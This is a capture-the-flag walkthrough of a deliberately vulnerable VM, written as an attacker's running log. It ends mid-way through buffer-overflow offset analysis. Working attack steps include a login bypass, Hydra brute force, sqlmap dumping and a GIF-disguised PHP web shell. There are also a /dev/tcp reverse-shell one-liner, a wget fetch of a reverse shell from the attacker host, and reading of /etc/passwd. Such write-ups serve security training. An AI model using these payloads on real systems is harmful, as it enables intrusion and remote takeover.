[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Traversal Engine DONE ! – Total traversal tests created: 11028

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Fuzz testing finished after 2.15 minutes (129 seconds)
[+] Total Traversals found (so far): 0
[-] Web server (192.168.1.18) didn’t respond !

Let’s go back to the first flag that says allthefiles….
So I checked the source of the page and found some js scripts with weird names:

<script src=”js/ZmxhZzJ7YVcxbVl.js“></script>
<script src=”js/XUnRhVzVwYzNS.js“></script>
<script src=”js/eVlYUnZjZz09fQ==.min.js“></script>

It looks like base64!

flag2{aW1mYWRtaW5pc3RyYXRvcg==}

Base64 decoded, it is imfadministrator

So I tried: http://192.168.0.18/imfadministrator/

and got a login page!

file:///tmp/tmp1LuymQ/4.png

Source of the page is interesting… I have now a name!

<form method=”POST” action=””>
<label>Username:</label><input type=”text” name=”user” value=””><br />
<label>Password:</label><input type=”password” name=”pass” value=””><br />
<input type=”submit” value=”Login”>
<!– I couldn’t get the SQL working, so I hard-coded the password. It’s still mad secure through. – Roger –>
</form>

Let’s see if this can be injected:

sqlmap -u “http://192.168.0.18/imfadministrator” –data “user=erik&pass=password” –dbs –threads=10 –random-agent –dbms mysql

Seems that is it not injectable….

I tried hydra but no result for now..

Let’s try roger and test

Interesting:
file:///tmp/tmp1LuymQ/5.png

So I went back to the contact page and tried different names I found. Nothing.
Then I see that Roger’s name is

Roger S. Michaels

So if I try rmichaels:

file:///tmp/tmp1LuymQ/6.png

So rmichaels is the user…
I can now retry hydra:

root@kali:~/boxes/imf# hydra -l rmichaels -P /usr/share/seclists/Passwords/darkc0de.txt 192.168.0.18 http-post-form “/imfadministrator:user=^USER^&pass=^PASS^:S=302”
Hydra v9.0 (c) 2019 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-19 13:56:15
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1471056 login tries (l:1/p:1471056), ~91941 tries per task
[DATA] attacking http-post-form://192.168.0.18:80/imfadministrator:user=^USER^&pass=^PASS^:S=302

[80][http-post-form] host: 192.168.0.18 login: rmichaels password: 017731264n6

1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-19 13:56:39

Didn’t work!!!!!

So the code is in PHP….

After a lot of googling, I found this:
https://stackoverflow.com/questions/1885979/php-get-variable-array-injection?source=post_page—–49be86323082———————-

So i tried with Burp:

POST /imfadministrator/ HTTP/1.1
Host: 192.168.0.18
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.18/imfadministrator/

Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Cookie: PHPSESSID=7colm2p1mfl8ga2tev7ne6rlj0
Connection: close
Upgrade-Insecure-Requests: 1

user=rmichaels&pass[]=

Bingo!

HTTP/1.1 200 OK
Date: Thu, 19 Sep 2019 17:16:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 100
Connection: close
Content-Type: text/html; charset=UTF-8

flag3{Y29udGludWVUT2Ntcw==}<br />Welcome, rmichaels<br /><a href=’cms.php?pagename=home’>IMF CMS</a>

It says continueTOcms

Now If I go back to Firefox:

file:///tmp/tmp1LuymQ/7.png

file:///tmp/tmp1LuymQ/8.png

The desavowed list link to:file:///tmp/tmp1LuymQ/9.png

Upload Report says: In construction

Nothing in the REDACTED image:

root@kali:~/boxes/imf# /root/tools/stegextract/stegextract redacted.jpg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done

sqlmap –url http://192.168.0.18/imfadministrator/cms.php?pagename=home –dump –method POST

Found another page in the database (table pages)
http://192.168.0.18/imfadministrator/cms.php?pagename=tutorials-incomplete
file:///tmp/tmp1LuymQ/10.png

There’s a QR Code in the picture: Flag4 !

flag4{dXBsb2Fkcjk0Mi5waHA=}

Decoded, we have: uploadr942.php

file:///tmp/tmp1LuymQ/11.png

I tried to upload a reverse php shell:

Intelligence Upload Form

Error: Invalid file type.

So i renamed it to .jpg:

Intelligence Upload Form

Error: CrappyWAF detected malware. Signature: exec function php detected

OK so I need to hide my code!

Let’s try a GIF and no exec:

GIF89a
<?php $cmd=$_GET[‘cmd’]; print(`$cmd`); ?>

I uploaded 1234.gif and it worked.. but when I try to find the file, I have a 404.

So let’s go back to the upload page result:

<html>
<head>
<title>File Uploader</title>
</head>
<body>
<h1>Intelligence Upload Form</h1>
File successfully uploaded.
<!– 6037118aaa39 –><form id=”Upload” action=”” enctype=”multipart/form-data” method=”post”>
<p>
<label for=”file”>File to upload:</label>
<input id=”file” type=”file” name=”file”>
</p>

<p>
<input id=”submit” type=”submit” name=”submit” value=”Upload”>
</p>
</form>

</body>
</html>

It seems like it renamed my file!

So let’s try to browse to:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=id

Bingo, I have code execution!

If I do an ls%20-al:

GIF89a
total 108
drwxr-xr-x 2 www-data www-data 4096 Sep 20 11:55 .
drwxr-xr-x 4 www-data www-data 4096 Oct 17 2016 ..
-rw-r–r– 1 www-data www-data 82 Oct 12 2016 .htaccess
-rw-r–r– 1 www-data www-data 50 Sep 20 11:53 3da1c1eeec42.gif
-rw-r–r– 1 www-data www-data 50 Sep 20 11:55 6037118aaa39.gif
-rw-r–r– 1 www-data www-data 83407 Sep 20 11:36 b2634466ab8e.jpg
-rw-r–r– 1 www-data www-data 28 Oct 12 2016 flag5_abc123def.txt

As you can see I did try multiple times!!!!!!

So let’s catch the flag first:

http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=cat%20flag5_abc123def.txt

flag5{YWdlbnRzZXJ2aWNlcw==}
it decodes as agentservices

http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=%75%6e%61%6d%65%20%2d%61

GIF89aLinux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

Let’s try now:

/bin/sh -i >& /dev/tcp/192.168.0.11/8080 0>&1

URL encoded:

%2f%62%69%6e%2f%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%30%2e%31%31%2f%38%30%38%30%20%30%3e%26%31

http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=%27%2f%62%69%6e%2f%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%30%2e%31%31%2f%38%30%38%30%20%30%3e%26%31%27

Didn’t work!

Let’s try differently:

I have a php reverse shell from PenTestMonkeys:

So I started an http server on kali:

python -m SimpleHTTPServer 9000

Then on the target:
http://192.168.0.18/imfadministrator/uploads/6037118aaa39.gif?cmd=wget%20192.168.0.11:9000/reverse2.php

Then on kali, I start netcat:

nc -nvlp 4444

Then on the target:
192.168.0.18/imfadministrator/uploads/reverse2.php

Bingo! a shell!

root@kali:~/tools/shells# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 53416
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
13:03:49 up 24 min, 0 users, load average: 0.15, 0.11, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can’t access tty; job control turned off

Now upgrading to a proper TTY:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

CTRL Z
stty raw -echo
fg and two times ENTER

export TERM=screen
reset

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
setup:x:1000:1000:setup,,,:/home/setup:/bin/bash

Let’s go back to he website for now to try to have passwords. in the index.php file I found:

398fj289fj2389fj398fjhhds^&#hkseifw3893h#(&$$*838hjf

for rmichaels… This was the hardcoded passord…
But actually rmichaels is not in /etc/passwd …. useless info!

Uploading linenum on the target then running it:

$ wget http://192.168.0.11/linenum.sh
–2019-09-23 07:45:31– http://192.168.0.11/linenum.sh
Connecting to 192.168.0.11:80… failed: Connection refused.
$ wget http://192.168.0.11:9000/linenum.sh
–2019-09-23 07:45:45– http://192.168.0.11:9000/linenum.sh
Connecting to 192.168.0.11:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’

0K ………. ………. ………. ………. …. 100% 132K=0.3s

2019-09-23 07:45:45 (132 KB/s) – ‘linenum.sh’ saved [45652/45652]

$ chmod +x linenum.sh
$ ./linenum.sh -t > scan.txt

### SYSTEM ##############################################
[-] Kernel information:
Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x8
6_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.4.0-45-generic (buildd@lgw01-34) (gcc version 5.4.0 20160609 (Ub
untu 5.4.0-6ubuntu1~16.04.2) ) #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION=”Ubuntu 16.04.1 LTS”
NAME=”Ubuntu”
VERSION=”16.04.1 LTS (Xenial Xerus)”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 16.04.1 LTS”
VERSION_ID=”16.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
UBUNTU_CODENAME=xenial

Checking if there’s any vulnerability with exploitdb.
Tried: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) – Local Privilege Escalation

Not working..

Interesting job:

root 1086 2.8 0.2 8752 2196 ? Ss 07:39 0:12 /usr/sbin/knockd -d

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:7788 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –

Now the problem is that I cannot read the knock.conf file….

knockd -l
/etc/knockd.conf: Permission denied

www-data@imf:/etc/xinetd.d$ cat agent
# default: on
# description: The agent server serves agent sessions
# unencrypted agentid for authentication.
service agent
{
flags = REUSE
socket_type = stream
wait = no
user = root
server = /usr/local/bin/agent
log_on_failure += USERID
disable = no
port = 7788
}

Hum, actually if I telnet port 7788, I have something!

telnet localhost 7788
]Trying ::1…
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID :

But cannot login….

Checking if there’s a local program running:

www-data@imf:/usr/local/bin$ ll
total 24
drwxr-xr-x 2 root root 4096 Oct 16 2016 .
drwxr-xr-x 10 root root 4096 Sep 22 2016 ..
-rw-r–r– 1 root root 19 Oct 16 2016 access_codes
-rwxr-xr-x 1 root root 11896 Oct 12 2016 agent

www-data@imf:/usr/local/bin$ cat access_codes
SYN 7482,8279,9467

Hum I might have the knock sequence here!

nmap -sS –max-retries 0 -T5 -p 7482,8279,9467 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:53 UTC
Warning: 192.168.0.18 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.0.18
Host is up (0.00043s latency).

PORT STATE SERVICE
7482/tcp filtered unknown
8279/tcp filtered unknown
9467/tcp filtered unknown

And now if I rescan the target:

root@kali:~/boxes/imf# nmap -p- 192.168.0.18
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 13:54 UTC
Nmap scan report for 192.168.0.18
Host is up (0.00049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
7788/tcp open unknown
MAC Address: 08:00:27:B1:4D:87 (Oracle VirtualBox virtual NIC)

But it actually just present me with what I already had! So useless

Going back to agent. I tired to upload it to my kali with a python http server but somehow it doesn’t work..

so
cp agent /var/www/html/imfadministrator/uploads

Then I downloaded it through the browser….
Now trying to decompile..

I run it with EDB and added a breakpoint where the Agent ID is evaluated:

file:///tmp/tmp1LuymQ/12.png

And I have a code in the stack: 48093572

I tried it on the target, and it worked!

www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection:

Extraction Points:
Staatsoper, Vienna, Austria
Blenheim Palace, Woodstock, Oxfordshire, England, UK
Great Windmill Street, Soho, London, England, UK
Fawley Power Station, Southampton, England, UK
Underground Station U4 Schottenring, Vienna, Austria
Old Town Square, Old Town, Prague, Czech Republic
Drake Hotel – 140 E. Walton Pl., Near North Side, Chicago, Illinois, USA
Ashton Park, Mosman, Sydney, New South Wales, Australia
Argyle Place, The Rocks, Sydney, New South Wales, Australia
www-data@imf:/usr/local/bin$ 2
2: command not found
www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 2

Extraction Request
Enter extraction location: Underground Station U4 Schottenring, Vienna, Austria
e
Location: Underground Station U4 Schottenring, Vienna, Austria

Extraction team has been deployed.

www-data@imf:/usr/local/bin$ ./agent
___ __ __ ___
|_ _| \/ | __| Agent
| || |\/| | _| Reporting
|___|_| |_|_| System

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3

Enter report update: 1234
Report: 1234
Submitted for review.

Trying a Buffer Overflow:

First thing:
echo 0 > /proc/sys/kernel/randomize_va_space

Agent ID : 48093572
Login Validated
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3

Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.
Segmentation fault (core dumped)

BINGO!

So running it with GDB on Kali:

Enter report update: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Report: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Submitted for review.

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0xffffd254 (‘a’ <repeats 152 times>, “T\322\377\377”, ‘a’ <repeats 44 times>…)
EBX: 0x0
ECX: 0xf7fa4890 –> 0x0
EDX: 0x16
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x61616161 (‘aaaa’)
ESP: 0xffffd300 (‘a’ <repeats 200 times>…)
EIP: 0x61616161 (‘aaaa’)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x61616161
[————————————stack————————————-]
0000| 0xffffd300 (‘a’ <repeats 200 times>…)
0004| 0xffffd304 (‘a’ <repeats 200 times>…)
0008| 0xffffd308 (‘a’ <repeats 200 times>…)
0012| 0xffffd30c (‘a’ <repeats 200 times>…)
0016| 0xffffd310 (‘a’ <repeats 200 times>…)
0020| 0xffffd314 (‘a’ <repeats 200 times>…)
0024| 0xffffd318 (‘a’ <repeats 200 times>…)
0028| 0xffffd31c (‘a’ <repeats 200 times>…)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x61616161 in ?? ()

So I create a unique patern using metasploit:

root@kali:~/boxes/imf# /usr/bin/msf-pattern_create -l 300 > unique.txt

Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Submitted for review.

Program received signal SIGSEGV, Segmentation fault.

Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection: 3

Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Submitted for review.

Program received signal SIGSEGV, Segmentation fault.
[———————————-registers———————————–]
EAX: 0xffffd254 (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9AfT\322\377\377Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag”…)
EBX: 0x0
ECX: 0xf7fa4890 –> 0x0
EDX: 0x16
ESI: 0xf7fa3000 –> 0x1d9d6c
EDI: 0xf7fa3000 –> 0x1d9d6c
EBP: 0x35664134 (‘4Af5’)
ESP: 0xffffd300 (“f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
EIP: 0x41366641 (‘Af6A’)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[————————————-code————————————-]
Invalid $PC address: 0x41366641
[————————————stack————————————-]
0000| 0xffffd300 (“f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0004| 0xffffd304 (“8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0008| 0xffffd308 (“Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0012| 0xffffd30c (“g1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0016| 0xffffd310 (“2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0020| 0xffffd314 (“Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
